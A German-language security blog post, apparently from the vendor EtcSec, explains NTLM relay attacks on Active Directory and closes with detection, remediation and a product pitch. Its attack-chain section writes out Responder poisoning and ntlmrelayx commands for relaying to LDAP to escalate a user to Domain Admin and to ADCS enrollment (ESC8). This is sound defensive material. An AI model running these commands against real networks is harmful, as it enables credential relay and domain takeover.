🏢Active DirectoryNetworkConfigAttack Paths

NTLM-Relay-Angriffe: Authentifizierung Entführen Ohne Passwörter zu Knacken

NTLM Relay ermöglicht Angreifern, Authentifizierung abzufangen und sich ohne Passwort-Cracking als Benutzer auszugeben. Lernen Sie wie der Angriff funktioniert und wie Sie die Exposition eliminieren.

ES
EtcSec Security Team
2 min read
NTLM-Relay-Angriffe: Authentifizierung Entführen Ohne Passwörter zu Knacken

Was Ist NTLM Relay?

NTLM Relay ist eine der zuverlässigsten netzwerkbasierten Angriffstechniken in Active Directory-Umgebungen. Es nutzt den Challenge-Response-Mechanismus der NTLM-Authentifizierung, um Authentifizierungsversuche von Opfern zu erfassen und in Echtzeit an andere Dienste weiterzuleiten — ohne ihr Passwort zu knacken.

Der Angriff erfordert nur Netzwerkzugang. Die Hauptursache kombiniert drei Faktoren: NTLM wird trotz seines Alters noch weitgehend verwendet, SMB-Signierung ist auf den meisten Workstations deaktiviert, und Legacy-Protokolle wie LLMNR und NBT-NS ermöglichen das Abfangen von Authentifizierungsversuchen.

Die Angriffskette

Schritt 1 - Relay-Infrastruktur Einrichten

# Responder — LLMNR/NBT-NS vergiften
responder -I eth0 -rdw --no-HTTP-Server --no-SMB-Server

# ntlmrelayx — an Ziele weiterleiten
ntlmrelayx.py -tf ziele.txt -smb2support -socks

Schritt 2 - Authentifizierung Erfassen und Weiterleiten

# Ausgabe bei erfolgreichem Relay:
# [*] Authenticating against smb://10.10.0.50 as CORP/jmüller SUCCEED

Schritt 3 - Hochwertige Ziele Ausnutzen

# Relay zu LDAP — Angreifer zu Domain Admins eskalieren
ntlmrelayx.py -t ldap://dc01.corp.local --escalate-user angreifer

# Relay zu ADCS-Web-Einschreibung (ESC8)
ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp --adcs --template Machine

Erkennung

SIEM-Erkennungsabfrage (Elastic KQL)

event.code: "4624" AND
winlog.event_data.LogonType: "3" AND
winlog.event_data.AuthenticationPackageName: "NTLM" AND
NOT winlog.event_data.WorkstationName: (winlog.event_data.TargetServerName OR "*DC*")

Behebung

💡 Schnelle Massnahme: SMB-Signierung auf allen Workstations via GPO aktivieren. Diese eine Änderung macht SMB-Relay unmöglich.

1. SMB-Signierung Aktivieren

# Via GPO: Sicherheitsoptionen
# "Microsoft-Netzwerkserver: Kommunikation digital signieren (immer)" = Aktiviert
Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters" -Name RequireSecuritySignature
# Sollte 1 zurückgeben

2. LLMNR und NBT-NS Deaktivieren

# LLMNR via GPO deaktivieren:
# Computerkonfiguration > Administrative Vorlagen > Netzwerk > DNS-Client
# "Multicast-Namensauflösung deaktivieren" = Aktiviert

Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcpip_*" `
    -Name NetbiosOptions -Value 2

3. Nur NTLMv2 Erzwingen

Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name LmCompatibilityLevel -Value 5

So Erkennt EtcSec Dies

NTLMV1_ALLOWED identifiziert Domänen, in denen NTLMv1 noch erlaubt ist — die schwächste NTLM-Version.

WDIGEST_ENABLED kennzeichnet Klartext-Credential-Caching, das die Auswirkungen von Credential-Diebstahl verschlimmert.

Netzwerkprüfungen bewerten auch SMB-Signierungskonfiguration, LDAP-Signierungsanforderungen und NTLM-Einschränkungsrichtlinien.

ℹ️ Hinweis: EtcSec prüft Netzwerk-Authentifizierungssicherheit bei jedem AD-Scan. Starten Sie ein kostenloses Audit.

🏢 Active DirectoryNetworkConfigAttack Paths
EtcSec

© 2026 EtcSec. All rights reserved.

NTLM-Relay-Angriffe: Erkennung und Prävention | EtcSec — EtcSec Blog | EtcSec